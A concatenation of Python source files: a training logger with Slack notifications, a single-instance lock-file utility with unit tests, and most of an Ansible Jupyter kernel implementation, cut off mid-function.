Axis (arcsec)\n") for i in range(0,len(gals)): name = gals[i] getVelocities(name,link) done = True
infolog.py
import atexit from datetime import datetime import json from threading import Thread from urllib.request import Request, urlopen _format = '%Y-%m-%d %H:%M:%S.%f' _file = None _run_name = None _slack_url = None def init(filename, run_name, slack_url=None): global _file, _run_name, _slack_url _close_logfile() _file = open(filename, 'a') _file.write('\n-----------------------------------------------------------------\n') _file.write('Starting new training run\n') _file.write('-----------------------------------------------------------------\n') _file.flush() _run_name = run_name _slack_url = slack_url def log(msg, slack=False): print(msg, flush=True) if _file is not None: _file.write('[%s] %s\n' % (datetime.now().strftime(_format)[:-3], msg)) _file.flush() if slack and _slack_url is not None: Thread(target=_send_slack, args=(msg,)).start() def _close_logfile(): global _file if _file is not None: _file.close() _file = None def _send_slack(msg): req = Request(_slack_url) req.add_header('Content-Type', 'application/json') urlopen(req, json.dumps({ 'username': 'tacotron', 'icon_emoji': ':taco:', 'text': '*%s*: %s' % (_run_name, msg) }).encode()) atexit.register(_close_logfile)
singleton.py
#! /usr/bin/env python import logging from multiprocessing import Process import os import sys import tempfile import unittest class SingleInstanceException(BaseException): pass class SingleInstance(object): """Class that can be instantiated only once per machine. If you want to prevent your script from running in parallel just instantiate SingleInstance() class. If is there another instance already running it will throw a `SingleInstanceException`. >>> import tendo ... me = SingleInstance() This option is very useful if you have scripts executed by crontab at small amounts of time. Remember that this works by creating a lock file with a filename based on the full path to the script file. Providing a flavor_id will augment the filename with the provided flavor_id, allowing you to create multiple singleton instances from the same file. This is particularly useful if you want specific functions to have their own singleton instances. """ def __init__(self, flavor_id="", lockfile=""): import sys self.initialized = False if lockfile: self.lockfile = lockfile else: basename = os.path.splitext(os.path.abspath(sys.argv[0]))[0].replace( "/", "-").replace(":", "").replace("\\", "-") + '-%s' % flavor_id + '.lock' self.lockfile = os.path.normpath( tempfile.gettempdir() + '/' + basename) logger.debug("SingleInstance lockfile: " + self.lockfile) if sys.platform == 'win32': try: # file already exists, we try to remove (in case previous # execution was interrupted) if os.path.exists(self.lockfile): os.unlink(self.lockfile) self.fd = os.open( self.lockfile, os.O_CREAT | os.O_EXCL | os.O_RDWR) except OSError: type, e, tb = sys.exc_info() if e.errno == 13: logger.error( "Another instance is already running, quitting.") raise SingleInstanceException() print(e.errno) raise else: # non Windows import fcntl self.fp = open(self.lockfile, 'w') self.fp.flush() try: fcntl.lockf(self.fp, fcntl.LOCK_EX | fcntl.LOCK_NB) except IOError: logger.warning( "Another instance is already running, quitting.") raise SingleInstanceException() self.initialized = True def __del__(self): import os import sys if not self.initialized: return try: if sys.platform == 'win32': if hasattr(self, 'fd'): os.close(self.fd) os.unlink(self.lockfile) else: import fcntl fcntl.lockf(self.fp, fcntl.LOCK_UN) # os.close(self.fp) if os.path.isfile(self.lockfile): os.unlink(self.lockfile) except Exception as e: if logger: logger.warning(e) else: print("Unloggable error: %s" % e) sys.exit(-1) def f(name): tmp = logger.level logger.setLevel(logging.CRITICAL) # we do not want to see the warning try: me2 = SingleInstance(flavor_id=name) # noqa except SingleInstanceException: sys.exit(-1) logger.setLevel(tmp) pass class testSingleton(unittest.TestCase): def test_1(self): me = SingleInstance(flavor_id="test-1") del me # now the lock should be removed assert True def test_2(self): p = Process(target=f, args=("test-2",)) p.start() p.join() # the called function should succeed assert p.exitcode == 0, "%s != 0" % p.exitcode def test_3(self): me = SingleInstance(flavor_id="test-3") # noqa -- me should still kept p = Process(target=f, args=("test-3",)) p.start() p.join() # the called function should fail because we already have another # instance running assert p.exitcode != 0, "%s != 0 (2nd execution)" % p.exitcode # note, we return -1 but this translates to 255 meanwhile we'll # consider that anything different from 0 is good p = Process(target=f, args=("test-3",)) p.start() p.join() # the called function should fail because we already have another # instance running assert p.exitcode != 0, "%s != 0 (3rd execution)" % p.exitcode def test_4(self): lockfile = '/tmp/foo.lock' me = SingleInstance(lockfile=lockfile) assert me.lockfile == lockfile logger = logging.getLogger("tendo.singleton") logger.addHandler(logging.StreamHandler()) if __name__ == "__main__": logger.setLevel(logging.DEBUG) unittest.main()
kernel.py
from __future__ import print_function from ipykernel.kernelbase import Kernel from ipykernel.comm import CommManager from ipykernel.zmqshell import ZMQInteractiveShell from IPython.core.display_trap import DisplayTrap from subprocess import check_output from traitlets import Instance, Type import pkg_resources import atexit import time import os import re import yaml import threading from subprocess import Popen, STDOUT, PIPE import logging import json import traceback import tempfile import six import pprint import shutil from pprint import pformat from six.moves import queue from collections import namedtuple, defaultdict import zmq from zmq.eventloop.zmqstream import ZMQStream from .modules import modules from .module_args import module_args from .task_args import task_args from .play_args import play_args from six.moves import configparser from zmq.eventloop.ioloop import IOLoop import ansible_runner StatusMessage = namedtuple('StatusMessage', ['message']) TaskCompletionMessage = namedtuple('TaskCompletionMessage', ['task_num']) TASK_ARGS_MODULES = modules + task_args __version__ = '1.0.0' logger = logging.getLogger('ansible_kernel.kernel') version_pat = re.compile(r'version (\d+(\.\d+)+)') DEBUG = False def ensure_directory(d): if not os.path.exists(d): os.mkdir(d) class _NullDisplay(object): def __init__(self): self.exec_result = None def __call__(self, result): logger.debug("NullDisplay %s", result) self.exec_result = result NullDisplay = _NullDisplay() NullDisplayTrap = DisplayTrap(hook=NullDisplay) class Splitter(object): def __init__(self, channels): self.channels = channels def send_multipart(self, msg, *args, **kwargs): logger.debug('send_multipart %s %s %s', msg, args, kwargs) for channel in self.channels: result = channel.send_multipart(msg, *args, **kwargs) logger.debug('result %s', result) class AnsibleKernelHelpersThread(object): def __init__(self, queue): self.queue = queue self.io_loop = IOLoop(make_current=False) context = zmq.Context.instance() self.pause_socket = context.socket(zmq.REP) self.pause_socket_port = self.pause_socket.bind_to_random_port( "tcp://127.0.0.1") self.status_socket = context.socket(zmq.PULL) self.status_socket_port = self.status_socket.bind_to_random_port( "tcp://127.0.0.1") self.pause_stream = ZMQStream(self.pause_socket, self.io_loop) self.status_stream = ZMQStream(self.status_socket, self.io_loop) self.pause_stream.on_recv(self.recv_pause) self.status_stream.on_recv(self.recv_status) self.thread = threading.Thread(target=self._thread_main) self.thread.daemon = True def start(self): logger.info('thread.start') self.thread.start() atexit.register(self.stop) def stop(self): logger.info('thread.stop start') if not self.thread.is_alive(): return self.io_loop.add_callback(self.io_loop.stop) self.thread.join() logger.info('thread.stop end') def recv_status(self, msg): logger.info(msg) self.queue.put(StatusMessage(json.loads(msg[0]))) def recv_pause(self, msg): logger.info("completed %s waiting...", msg) self.queue.put(TaskCompletionMessage(json.loads(msg[0]))) def _thread_main(self): """The inner loop that's actually run in a thread""" self.io_loop.make_current() self.io_loop.start() self.io_loop.close(all_fds=True) class AnsibleKernel(Kernel): shell = Instance('IPython.core.interactiveshell.InteractiveShellABC', allow_none=True) shell_class = Type(ZMQInteractiveShell) implementation = 'ansible_kernel' implementation_version = __version__ @property def language_version(self): m = version_pat.search(self.banner) return m.group(1) _banner = None @property def banner(self): if self._banner is None: self._banner = check_output( ['ansible', '--version']).decode('utf-8') return self._banner language_info = {'name': 'ansible', 'codemirror_mode': 'yaml', 'mimetype': 'text/yaml', 'file_extension': '.yml'} help_links = [ { 'text': 'Ansible Reference', 'url': 'https://docs.ansible.com/ansible/latest/index.html' } ] def __init__(self, **kwargs): start_time = time.time() Kernel.__init__(self, **kwargs) logger.debug("session %s %s", type(self.session), self.session) logger.debug("iopub_socket %s %s", type(self.iopub_socket), self.iopub_socket) self.original_iopub_socket = self.iopub_socket self.iopub_socket = Splitter([self.original_iopub_socket, self]) self.user_ns = {} self.shell = self.shell_class.instance(parent=self, profile_dir=self.profile_dir, user_ns=self.user_ns, kernel=self) self.shell.displayhook.session = self.session self.shell.displayhook.pub_socket = self.iopub_socket self.shell.displayhook.topic = self._topic('execute_result') self.shell.display_pub.session = self.session self.shell.display_pub.pub_socket = self.iopub_socket self.comm_manager = CommManager(parent=self, kernel=self) self.shell.configurables.append(self.comm_manager) self.shell_handlers['comm_open'] = self.comm_open self.shell_handlers['comm_msg'] = self.comm_msg self.shell_handlers['comm_close'] = self.comm_close self.ansible_cfg = None self.ansible_process = None self.current_play = None self.next_task_file = None self.task_files = [] self.registered_variable = None self.playbook_file = None self.silent = False self.runner = None self.runner_thread = None self.shutdown_requested = False self.shutdown = False self.widgets = defaultdict(dict) self.widget_update_order = 0 self.vault_password = None self.default_inventory = "[all]\nlocalhost ansible_connection=local\n" self.default_play = yaml.dump(dict(hosts='localhost', name='default', gather_facts=False)) self.temp_dir = tempfile.mkdtemp(prefix="ansible_kernel_playbook") self.queue = None self.tasks_counter = 0 self.current_task = None logger.debug(self.temp_dir) ensure_directory(os.path.join(self.temp_dir, 'env')) ensure_directory(os.path.join(self.temp_dir, 'project')) self.copy_files() ensure_directory(os.path.join(self.temp_dir, 'project', 'roles')) with open(os.path.join(self.temp_dir, 'env', 'settings'), 'w') as f: f.write(json.dumps(dict(idle_timeout=0, job_timeout=0))) self.do_inventory(self.default_inventory) self.shell.run_code("import json") self.do_execute_play(self.default_play) logger.info("Kernel init finished took %s", time.time() - start_time) def copy_files(self): src = os.path.abspath('.') dest = os.path.join(self.temp_dir, 'project') src_files = os.listdir(src) for file_name in src_files: full_file_name = os.path.join(src, file_name) if (os.path.isfile(full_file_name)): shutil.copy(full_file_name, dest) if (os.path.isdir(full_file_name)): shutil.copytree(full_file_name, os.path.join(dest, file_name)) def start_helper(self): self.queue = queue.Queue() self.helper = AnsibleKernelHelpersThread(self.queue) self.helper.start() self.process_widgets() logger.info("Started helper") config = configparser.SafeConfigParser() if self.ansible_cfg is not None: config.readfp(six.StringIO(self.ansible_cfg)) if not os.path.exists(os.path.join(self.temp_dir, 'project')): os.mkdir(os.path.join(self.temp_dir, 'project')) if not config.has_section('defaults'): config.add_section('defaults') if config.has_option('defaults', 'roles_path'): roles_path = config.get('defaults', 'roles_path') roles_path = ":".join([os.path.abspath(x) for x in roles_path.split(":")]) roles_path = "{0}:{1}".format(roles_path, os.path.abspath(pkg_resources.resource_filename('ansible_kernel', 'roles'))) config.set('defaults', 'roles_path', roles_path) else: config.set('defaults', 'roles_path', os.path.abspath( pkg_resources.resource_filename('ansible_kernel', 'roles'))) logger.debug("vault_password? %s", self.vault_password and not config.has_option('defaults', 'vault_password_file')) if self.vault_password and not config.has_option('defaults', 'vault_password_file'): vault_password_file = os.path.join(self.temp_dir, 'project', 'vault-secret') with open(vault_password_file, 'w') as vpf: vpf.write(self.vault_password) config.set('defaults', 'vault_password_file', vault_password_file) if not config.has_section('callback_ansible_kernel_helper'): config.add_section('callback_ansible_kernel_helper') config.set('callback_ansible_kernel_helper', 'status_port', str(self.helper.status_socket_port)) with open(os.path.join(self.temp_dir, 'project', 'ansible.cfg'), 'w') as f: config.write(f) logger.info("Wrote ansible.cfg") def rewrite_ports(self): with open(self.playbook_file, 'r') as f: playbook = yaml.load(f.read(), Loader=yaml.FullLoader) playbook[0]['tasks'][0]['pause_for_kernel']['port'] = self.helper.pause_socket_port with open(self.playbook_file, 'w') as f: f.write(yaml.safe_dump(playbook, default_flow_style=False)) def clean_up_task_files(self, backup=False): for task_file in self.task_files: if backup: shutil.copy(task_file, task_file + ".bak") if os.path.exists(task_file): os.unlink(task_file) self.task_files = [] def runner_process_message(self, data): logger.info("runner message:\n{}".format(pprint.pformat(data))) try: event_data = data.get('event_data', {}) task = event_data.get('task') role = event_data.get('role', None) event = data.get('event') if DEBUG: stream_content = dict(name='stdout', text="{}\n".format(pprint.pformat(data))) self.send_response(self.iopub_socket, 'stream', stream_content) if event == 'playbook_on_start': pass elif event == 'playbook_on_play_start': pass elif event == 'playbook_on_stats': pass elif event == 'playbook_on_include': pass elif event == 'runner_on_start': pass elif event == 'playbook_on_task_start': logger.debug('playbook_on_task_start') task_args = event_data.get('task_args', []) task_uuid = data.get('uuid', '') self.queue.put(StatusMessage(['TaskStart', dict(task_name=task, role_name=role, task_arg=task_args, task_id=task_uuid)])) elif event == 'runner_on_ok': logger.debug('runner_on_ok') results = event_data.get('res', {}) device_name = event_data.get('host') task_uuid = data.get('uuid', '') self.queue.put(StatusMessage(['TaskStatus', dict(task_name=task, role_name=role, device_name=device_name, delegated_host_name=device_name, changed=results.get('changed', False), failed=False, unreachable=False, skipped=False, application_python=self._format_application_python(results), text_html=self._format_text_html(results), output=self._format_output(results), error=self._format_error(results), full_results=json.dumps(results).replace('\\', '\\\\'), results=self._dump_results(results), task_id=task_uuid)])) elif event == 'runner_on_failed': device_name = event_data.get('host') task_uuid = data.get('uuid', '') results = event_data.get('res', {}) self.queue.put(StatusMessage(['TaskStatus', dict(task_name=task, role_name=role, device_name=device_name, changed=False, failed=True, unreachable=False, skipped=False, delegated_host_name=device_name, application_python=self._format_application_python(results), text_html=self._format_text_html(results), output=self._format_output(results), error=self._format_error(results), full_results=json.dumps(results).replace('\\', '\\\\'), results=self._dump_results(results), task_id=task_uuid)])) elif event == 'runner_on_unreachable': device_name = event_data.get('host') task_uuid = data.get('uuid', '') self.queue.put(StatusMessage(['TaskStatus', dict(task_name=task, role_name=role, device_name=device_name, changed=False, failed=False, unreachable=True, skipped=False, task_id=task_uuid)])) elif event == 'error': self.queue.put(StatusMessage(['Error', dict(stdout=data.get('stdout', ''))])) else: stream_content = dict(name='stdout', text="{}\n".format(pprint.pformat(data))) self.send_response(self.iopub_socket, 'stream', stream_content) except BaseException: logger.error(traceback.format_exc()) def process_message(self, message): logger.info("message %s", message) stop_processing = False message_type = message[0] message_data = message[1] logger.info("message_type %s", message_type) logger.info("message_data %s", message_data) if message_data.get('task_name', '') == 'pause_for_kernel': logger.debug('pause_for_kernel') return stop_processing if message_data.get('task_name', '') == 'include_variables': return stop_processing if message_data.get('task_name', '') == 'include_vars': return stop_processing if message_data.get('task_name', '') == 'include_tasks': logger.debug('include_tasks') if message_type == 'TaskStatus' and message_data.get('failed', False): logger.debug('failed') output = 'fatal: [%s]: FAILED!' % message_data['device_name'] if message_data.get('results', None): output += " => " output += message_data['results'] output += "\n" stream_content = {'name': 'stdout', 'text': str(output)} self.send_response(self.iopub_socket, 'stream', stream_content) return stop_processing output = '' if message_type == 'TaskStart': logger.debug('TaskStart') task_name = message_data['task_name'] if message_data.get('role_name'): task_name = "%s : %s" % (message_data['role_name'], task_name) output = 'TASK [%s] %s\n' % (task_name, '*' * (72 - len(task_name))) elif message_type == 'DeviceStatus': logger.debug('DeviceStatus') pass elif message_type == 'PlaybookEnded': logger.debug('PlaybookEnded') output = "\nPlaybook ended\nContext lost!\n" self.do_shutdown(False) self.clean_up_task_files(True) self.start_helper() self.rewrite_ports() self.start_ansible_playbook() stop_processing = True elif message_type == 'TaskStatus': logger.debug('TaskStatus') if message_data.get('changed', False): logger.debug('changed') output = 'changed: [%s]' % message_data['device_name'] elif message_data.get('unreachable', False): logger.debug('unreachable') output = 'fatal: [%s]: UNREACHABLE!' % message_data['device_name'] elif message_data.get('failed', False): logger.debug('failed') output = 'fatal: [%s]: FAILED!' % message_data['device_name'] else: logger.debug('ok') output = 'ok: [%s]' % message_data['device_name'] if message_data.get('full_results', None) and self.registered_variable is not None: logger.debug('full_results %s', type(message_data.get('full_results'))) line1 = "import json" line2 = "{0} = globals().get('{0}', dict())".format(self.registered_variable) line3 = "{0}['{2}'] = json.loads('{1}')".format(self.registered_variable, message_data.get('full_results'), message_data['device_name']) for line in [line1, line2, line3]: logger.debug(line) self.shell.run_cell(line) if message_data.get('results', None): output += " => " output += message_data['results'] if message_data.get('output', None): output += "\n\n[%s] stdout:\n" % message_data['device_name'] output += message_data['output'] if message_data.get('error', None): output += "\n\n[%s] stderr:\n" % message_data['device_name'] output += message_data['error'] if message_data.get('application_python', None): self.shell.run_cell(message_data.get('application_python')) if message_data.get('text_html', None): self.send_response(self.iopub_socket, 'display_data', dict(source="", data={"text/html": message_data.get('text_html')})) output += "\n" elif message_type == 'Error': logger.debug('Error') output = message_data.get('stdout') else: output = str(message) logger.info("output %s", output) if not self.silent: # Send standard output logger.info("sending output") stream_content = {'name': 'stdout', 'text': str(output)} self.send_response(self.iopub_socket, 'stream', stream_content) else: logger.info("silent") logger.info("stop_processing %s", stop_processing) return stop_processing def do_execute(self, code, silent, store_history=True, user_expressions=None, allow_stdin=False): self.silent = silent if not code.strip(): return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} logger.debug('code %r', code) try: if code.strip().startswith("#inventory"): return self.do_inventory(code) elif code.strip().startswith("#ansible.cfg"): return self.do_ansible_cfg(code) elif code.strip().startswith("#host_vars"): return self.do_host_vars(code) elif code.strip().startswith("#group_vars"): return self.do_group_vars(code) elif code.strip().startswith("#vars"): return self.do_vars(code) elif code.strip().startswith("#template"): return self.do_template(code) elif code.strip().startswith("#task"): return self.do_execute_task(code) elif code.strip().startswith("#play"): return self.do_execute_play(code) elif code.strip().startswith("#python"): return self.do_execute_python(code) elif code.strip().startswith("#vault_password"): return self.do_execute_vault_password(code) else: return self.do_execute_task(code) except BaseException as e: logger.error(traceback.format_exc()) reply = {'status': 'error', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}, 'traceback': traceback.format_exc().splitlines(), 'ename': type(e).__name__, 'evalue': str(e)} self.send_response(self.iopub_socket, 'error', reply, ident=self._topic('error')) return reply def send_traceback(self, e, limit=None): reply = {'status': 'error', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}, 'traceback': traceback.format_exc(limit).splitlines(), 'ename': type(e).__name__, 'evalue': str(e)} self.send_response(self.iopub_socket, 'error', reply, ident=self._topic('error')) return reply def send_error(self, e, limit=None): reply = {'status': 'error', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}, 'traceback': str(e).splitlines(), 'ename': type(e).__name__, 'evalue': str(e)} self.send_response(self.iopub_socket, 'error', reply, ident=self._topic('error')) return reply def do_inventory(self, code): logger.info("inventory set to %s", code) with open(os.path.join(self.temp_dir, 'inventory'), 'w') as f: f.write("\n".join(code.splitlines()[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_ansible_cfg(self, code): self.ansible_cfg = str(code) # Test that the code for ansible.cfg is parsable. Do not write the file yet. try: config = configparser.SafeConfigParser() if self.ansible_cfg is not None: config.readfp(six.StringIO(self.ansible_cfg)) except configparser.ParsingError as e: return self.send_error(e, 0) logger.info("ansible.cfg set to %s", code) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_host_vars(self, code): code_lines = code.strip().splitlines(True) host = code_lines[0][len('#host_vars'):].strip() logger.debug("host %s", host) host_vars = os.path.join(self.temp_dir, 'project', 'host_vars') if not os.path.exists(host_vars): os.mkdir(host_vars) with open(os.path.join(host_vars, host), 'w') as f: f.write("".join(code_lines[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_vars(self, code): code_lines = code.strip().splitlines(True) vars = code_lines[0][len('#vars'):].strip() logger.debug("vars %s", vars) with open(os.path.join(self.temp_dir, 'project', vars), 'w') as f: f.write("".join(code_lines[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_template(self, code): code_lines = code.strip().splitlines(True) template = code_lines[0][len('#template'):].strip() logger.debug("template %s", template) with open(os.path.join(self.temp_dir, 'project', template), 'w') as f: f.write("".join(code_lines[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_group_vars(self, code): code_lines = code.strip().splitlines(True) group = code_lines[0][len('#group_vars'):].strip() logger.debug("group %s", group) group_vars = os.path.join(self.temp_dir, 'project', 'group_vars') if not os.path.exists(group_vars): os.mkdir(group_vars) with open(os.path.join(group_vars, group), 'w') as f: f.write("".join(code_lines[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_execute_play(self, code): if self.is_ansible_alive(): self.do_shutdown(False) self.start_helper() code_data = yaml.load(code, Loader=yaml.FullLoader) logger.debug('code_data %r', code_data) logger.debug('code_data type: %s', type(code_data)) self.current_play = code playbook = [] current_play = yaml.load(self.current_play, Loader=yaml.FullLoader) if current_play is None: current_play = {} playbook.append(current_play) tasks = current_play['tasks'] = current_play.get('tasks', []) current_play['roles'] = current_play.get('roles', []) for role in current_play['roles']: if "." in role: self.get_galaxy_role(role) current_play['roles'].insert(0, 'ansible_kernel_helpers') tasks.append({'pause_for_kernel': {'host': '127.0.0.1', 'port': self.helper.pause_socket_port, 'task_num': self.tasks_counter - 1}}) widget_vars_file = os.path.join(self.temp_dir, 'project', 'widget_vars.yml') with open(widget_vars_file, 'w') as f: f.write(yaml.dump({})) tasks.append({'include_vars': {'file': 'widget_vars.yml'}}) tasks.append( {'include_tasks': 'next_task{0}.yml'.format(self.tasks_counter)}) logger.debug(yaml.safe_dump(playbook, default_flow_style=False)) if not os.path.exists(os.path.join(self.temp_dir, 'project')): os.mkdir(os.path.join(self.temp_dir, 'project')) self.playbook_file = (os.path.join(self.temp_dir, 'project', 'playbook.yml')) with open(self.playbook_file, 'w') as f: f.write(yaml.safe_dump(playbook, default_flow_style=False)) # Weird work around for streaming content not showing stream_content = {'name': 'stdout', 'text': '\n'} self.send_response(self.iopub_socket, 'stream', stream_content) # End weird work around self.start_ansible_playbook() logger.info("done") return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def start_ansible_playbook(self): # We may need to purge artifacts when we start again if os.path.exists(os.path.join(self.temp_dir, 'artifacts')): shutil.rmtree(os.path.join(self.temp_dir, 'artifacts')) logger.info("runner starting") env = os.environ.copy() env['ANSIBLE_KERNEL_STATUS_PORT'] = str(self.helper.status_socket_port) self.runner_thread, self.runner = ansible_runner.run_async(private_data_dir=self.temp_dir, playbook="playbook.yml", quiet=True, debug=True, ignore_logging=True, cancel_callback=self.cancel_callback, finished_callback=self.finished_callback, event_handler=self.runner_process_message) logger.info("runner started") logger.info("Runner status: {}".format(self.runner.status)) while self.runner.status in ['unstarted', 'running', 'starting']: logger.info("In runner loop") try: logger.info("getting message %s", self.helper.pause_socket_port) msg = self.queue.get(timeout=1) except queue.Empty: logger.info("Queue Empty!") continue logger.info(msg) if isinstance(msg, StatusMessage): if self.process_message(msg.message): break elif isinstance(msg, TaskCompletionMessage): logger.info('msg.task_num %s tasks_counter %s', msg.task_num, self.tasks_counter) break elif not self.is_ansible_alive(): logger.info("ansible is dead") self.do_shutdown(False) break logger.info("Bottom of runner loop") time.sleep(1) logger.info("Runner state is now {}".format(self.runner.status)) self.clean_up_task_files() logger.info("done") def process_widgets(self): # Extract values from widgets # Values in widgets with a var_name property are added to the vars file # Values in widgets with a ansible_kernel_property are store into special variables widget_vars_file = os.path.join(self.temp_dir, 'project', 'widget_vars.yml') logger.debug("widget_vars_file %s", widget_vars_file) widget_vars = {} for widget in sorted(self.widgets.values(), key=lambda x: x['widget_update_order']): logger.debug("widget %s", pformat(widget)) if 'var_name' in widget and 'value' in widget: widget_vars[widget['var_name']] = widget['value'] if 'ansible_kernel_property' in widget and 'value' in widget: if widget['ansible_kernel_property'] == 'vault_password': self.vault_password = widget['value'] logger.debug("set vault_password") # Save the vars from the widgets and include it for this task with open(widget_vars_file, 'w') as f: f.write(yaml.safe_dump(widget_vars, default_flow_style=False)) def do_execute_task(self, code): if not self.is_ansible_alive(): logger.info("ansible is dead") self.do_shutdown(False) if self.helper is None: output = "No play found. Run a valid play cell" stream_content = {'name': 'stdout', 'text': str(output)} self.send_response(self.iopub_socket, 'stream', stream_content) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} self.registered_variable = None self.current_task = code try: code_data = yaml.load(code, Loader=yaml.FullLoader) except Exception: code_data = code logger.debug('code_data %s', code_data) logger.debug('code_data type: %s', type(code_data)) if isinstance(code_data, str): if (code_data.endswith("?")): module = code_data[:-1].split()[-1] else: module = code_data.split()[-1] data = self.get_module_doc(module) payload = dict( source='', data=data) logging.debug('payload %s', payload) # content = {'name': 'stdout', 'text': str(payload)} self.send_response(self.iopub_socket, 'display_data', payload) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} elif isinstance(code_data, list): code_data = code_data[0] elif isinstance(code_data, dict): code_data = code_data elif code_data is None: return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} else: logger.error('code_data %s unsupported type', type(code_data)) if not isinstance(code_data, dict): try: code_data = yaml.load(code, Loader=yaml.FullLoader) tb = [] except Exception: tb = traceback.format_exc(1).splitlines() reply = {'status': 'error', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}, 'traceback': ['Invalid task cell\n'] + tb, 'ename': 'Invalid cell', 'evalue': ''} self.send_response(self.iopub_socket, 'error', reply, ident=self._topic('error')) return reply if 'include_role' in code_data.keys(): role_name = code_data['include_role'].get('name', '') if '.' in role_name: self.get_galaxy_role(role_name) if 'register' in code_data.keys(): self.registered_variable = code_data['register'] interrupted = False try: tasks = [] current_task_data = yaml.load(self.current_task, Loader=yaml.FullLoader) current_task_data['ignore_errors'] = True tasks.append(current_task_data) tasks.append({'pause_for_kernel': {'host': '127.0.0.1', 'port': self.helper.pause_socket_port, 'task_num': self.tasks_counter}}) self.process_widgets() tasks.append({'include_vars': {'file': 'widget_vars.yml'}}) # Create the include file task to look for the future task tasks.append( {'include_tasks': 'next_task{0}.yml'.format(self.tasks_counter + 1)}) logger.debug(yaml.safe_dump(tasks, default_flow_style=False)) self.next_task_file = os.path.join(self.temp_dir, 'project', 'next_task{0}.yml'.format(self.tasks_counter)) self.tasks_counter += 1 self.task_files.append(self.next_task_file) with open(self.next_task_file, 'w') as f: f.write(yaml.safe_dump(tasks, default_flow_style=False)) logger.info('Wrote %s', self.next_task_file) self.helper.pause_socket.send_string('Proceed') while True: logger.info("getting message %s", self.helper.pause_socket_port) msg = self.queue.get() logger.info(msg) if isinstance(msg, StatusMessage): if self.process_message(msg.message): break elif isinstance(msg, TaskCompletionMessage): logger.info('msg.task_num %s tasks_counter %s', msg.task_num, self.tasks_counter) break except KeyboardInterrupt: logger.error(traceback.format_exc()) if interrupted: return {'status': 'abort', 'execution_count': self.execution_count} return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_execute_python(self, code): code = "".join(code.splitlines(True)[1:]) reply_content = {} res = self.shell.run_cell(code) logger.debug('do_execute_python res %s', pformat(res)) if res.success: reply_content['status'] = 'ok' else: reply_content['status'] = 'error' reply_content['execution_count'] = self.execution_count reply_content['payload'] = self.shell.payload_manager.read_payload() self.shell.payload_manager.clear_payload() self.export_python_variables() return reply_content def export_python_variables(self): try: self.silent = True original_display_trap = self.shell.display_trap self.shell.display_trap = NullDisplayTrap line1 = "import types" line2 = "import json" line3 = "json.dumps([_x for _x, _v in globals().items() if " \ "not _x.startswith('_') and " \ "_x not in ['In', 'Out', 'quit', 'pprint', 'exit', 'get_ipython'] and " \ "not isinstance(_v, types.ModuleType)])" for line in [line1, line2, line3]: res = self.shell.run_cell(line) logger.debug('export_python_variables res %s', pformat(res)) logger.debug('export_python_variables NullDisplay %s', pformat(NullDisplay.exec_result)) variable_values = dict() if res.success and NullDisplay.exec_result: logger.debug('export_python_variables %s', pformat(json.loads(NullDisplay.exec_result))) variable_names = json.loads(NullDisplay.exec_result) NullDisplay.exec_result = None for variable in variable_names: res = self.shell.run_cell('json.dumps({0})'.format(variable)) if res.success and NullDisplay.exec_result: variable_values[variable] = json.loads(NullDisplay.exec_result) NullDisplay.exec_result = None else: logger.debug('export_python_variables error') logger.debug('export_python_variables variable_values %s', pformat(variable_values)) self.do_execute_task(yaml.dump(dict(set_fact=variable_values))) finally: self.silent = False self.shell.display_trap = original_display_trap def do_execute_vault_password(self, code): self.shell.run_cell("import ansible_kernel.widgets\n" "style = {'description_width': 'initial'}\n" "ansible_kernel.widgets.VaultPassword(description='Vault Password:', style=style)\n") return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_complete(self, code, cursor_pos): code = code[:cursor_pos] default = {'matches': [], 'cursor_start': 0, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} if code.strip().startswith("#inventory"): return default elif code.strip().startswith("#ansible.cfg"): return default elif code.strip().startswith("#host_vars"): return default elif code.strip().startswith("#group_vars"): return default elif code.strip().startswith("#task"): return self.do_complete_task(code, cursor_pos) elif code.strip().startswith("#play"): return self.do_complete_play(code, cursor_pos) else: return self.do_complete_task(code, cursor_pos) def do_complete_task(self, code, cursor_pos): default = {'matches': [], 'cursor_start': 0, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} logger.debug('code %r', code) if not code or code[-1] == ' ': return default found_module = False code_data = None try: code_data = yaml.load(code, Loader=yaml.FullLoader) except Exception: try: code_data = yaml.load(code + ":", Loader=yaml.FullLoader) except Exception: code_data = None if code_data is not None: logger.debug('code_data %s', code_data) if isinstance(code_data, list) and len(code_data) > 0: code_data = code_data[0] if isinstance(code_data, dict): for key in code_data.keys(): if key in modules: module_name = key found_module = True break logger.debug('found_module %s', found_module) tokens = code.split() if not tokens: return default matches = [] token = tokens[-1] start = cursor_pos - len(token) logger.debug('token %s', token) if not found_module: for module in TASK_ARGS_MODULES: if module.startswith(token): matches.append(module) else: for arg in module_args.get(module_name, []) + task_args: if arg.startswith(token): matches.append(arg) if not matches: return default matches = [m for m in matches if m.startswith(token)] return {'matches': sorted(matches), 'cursor_start': start, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} def do_complete_play(self, code, cursor_pos): default = {'matches': [], 'cursor_start': 0, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} logger.debug('code %r', code) if not code or code[-1] == ' ': return default tokens = code.split() if not tokens: return default matches = [] token = tokens[-1] start = cursor_pos - len(token) 